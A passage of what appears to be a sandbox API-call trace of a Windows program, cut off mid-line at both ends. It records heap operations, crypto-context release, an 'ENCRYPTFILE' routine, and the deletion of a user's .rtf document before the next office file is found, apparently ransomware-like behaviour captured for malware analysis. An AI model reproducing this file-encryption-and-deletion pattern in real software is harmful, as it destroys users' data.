lpsz="bool") returned 0x4 [0080.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0080.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796ee8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0080.792] CryptReleaseContext (hProv=0x41a4e98, dwFlags=0x0) returned 1 [0080.793] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0080.794] FreeLibrary (hLibModule=0x756e0000) returned 1 [0080.794] CloseHandle (hObject=0x258) returned 1 [0080.794] CloseHandle (hObject=0x298) returned 1 [0080.832] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\bbYe6GX.rtf", nBufferLength=0x7fff, lpBuffer=0x143ea88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\bbYe6GX.rtf", lpFilePart=0x0) returned 0x3c [0080.832] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\bbYe6GX.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\bbye6gx.rtf")) returned 0x20 [0080.833] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\bbYe6GX.rtf", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0a74e20, ftCreationTime.dwHighDateTime=0x1d5ecc1, ftLastAccessTime.dwLowDateTime=0xa975cc0, ftLastAccessTime.dwHighDateTime=0x1d5e9b2, ftLastWriteTime.dwLowDateTime=0xa975cc0, ftLastWriteTime.dwHighDateTime=0x1d5e9b2, nFileSizeHigh=0x0, nFileSizeLow=0x7f03, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="bbYe6GX.rtf", cAlternateFileName="")) returned 0x41ac000 [0080.833] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\bbYe6GX.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\bbye6gx.rtf")) returned 1 [0080.834] FindNextFileW (in: hFindFile=0x41ac000, lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0a74e20, ftCreationTime.dwHighDateTime=0x1d5ecc1, ftLastAccessTime.dwLowDateTime=0xa975cc0, ftLastAccessTime.dwHighDateTime=0x1d5e9b2, ftLastWriteTime.dwLowDateTime=0xa975cc0, ftLastWriteTime.dwHighDateTime=0x1d5e9b2, nFileSizeHigh=0x0, nFileSizeLow=0x7f03, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="bbYe6GX.rtf", cAlternateFileName="")) returned 0 [0080.834] FindClose (in: hFindFile=0x41ac000 | out: hFindFile=0x41ac000) returned 1 [0080.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359ba0 | out: hHeap=0x1780000) returned 1 [0080.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0080.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0080.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0080.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a4508 | out: hHeap=0x1780000) returned 1 [0080.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0080.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0080.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0080.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0080.835] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0080.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac040 | out: hHeap=0x1780000) returned 1 [0080.835] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0080.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0080.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0080.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0080.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0080.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0080.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0080.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0080.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0080.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0080.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41817a8 | out: hHeap=0x1780000) returned 1 [0080.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0080.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0080.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0080.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0080.836] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0080.836] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0080.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0080.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0080.836] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0080.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0080.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0080.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0080.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2760 [0080.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0080.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0080.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0080.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0080.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0080.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0080.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0080.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0080.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e220 [0080.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0080.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0080.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0080.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0080.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x120) returned 0x43cc1c8 [0080.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431e220 | out: hHeap=0x1780000) returned 1 [0080.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0080.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0080.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0080.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0080.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad78 [0080.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0080.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0080.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0080.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0080.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0080.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0080.837] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0080.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0080.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0080.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f28 [0080.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0080.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0080.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0080.837] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0080.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0080.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0080.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0080.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0080.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0080.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0080.838] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\E_f7p3czO1Cdd9o.xls", lpFindFileData=0x144e970 | out: lpFindFileData=0x144e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d2cd410, ftCreationTime.dwHighDateTime=0x1d5e302, ftLastAccessTime.dwLowDateTime=0xba9d2b40, ftLastAccessTime.dwHighDateTime=0x1d5f114, ftLastWriteTime.dwLowDateTime=0xba9d2b40, ftLastWriteTime.dwHighDateTime=0x1d5f114, nFileSizeHigh=0x0, nFileSizeLow=0xa39c, dwReserved0=0x101b1fc, dwReserved1=0x8, cFileName="E_f7p3czO1Cdd9o.xls", cAlternateFileName="E_F7P3~1.XLS")) returned 0x41ac780 [0080.838] FindClose (in: hFindFile=0x41ac780 | out: hFindFile=0x41ac780) returned 1 [0080.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0080.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0080.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0080.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0080.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0080.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0080.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0080.838] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0080.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0080.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0080.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0080.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2880 [0080.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0080.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0080.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0080.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0080.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0080.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab20 [0080.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0080.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0080.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0080.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0080.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0080.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0080.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0080.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0080.839] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0080.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0080.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0080.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0080.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0080.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0080.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0080.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0080.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0080.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ea8 [0080.840] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0080.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ea8 | out: hHeap=0x1780000) returned 1 [0080.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0080.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0080.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28e0 [0080.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0080.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0080.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0080.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0080.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0080.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2790 [0080.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0080.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0080.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0080.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2750 [0080.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0080.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0080.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0080.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabe0 [0080.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0080.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0080.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0080.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0080.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0080.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0080.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0080.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0080.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0080.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0080.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0080.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0080.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0080.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0080.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0080.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0080.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0080.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0080.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0080.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0080.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0080.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0080.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0080.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0080.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0080.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0080.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0080.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0080.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0080.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ea8 [0080.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0080.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0080.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0080.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0080.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0080.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0080.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0080.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0080.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0080.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0080.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0080.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0080.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0080.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0080.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0080.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0080.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0080.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0080.842] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0080.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0080.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0080.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0080.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0080.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0080.843] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0080.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0080.843] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0080.843] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0080.843] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0080.843] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0080.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0080.843] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0080.843] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0080.843] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2d0 [0080.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0080.843] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb120 [0080.843] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0080.843] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb198 [0080.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0080.843] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0080.843] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0080.843] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb270 [0080.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0080.843] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb150 [0080.843] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0080.843] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0080.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0080.843] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0080.844] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, 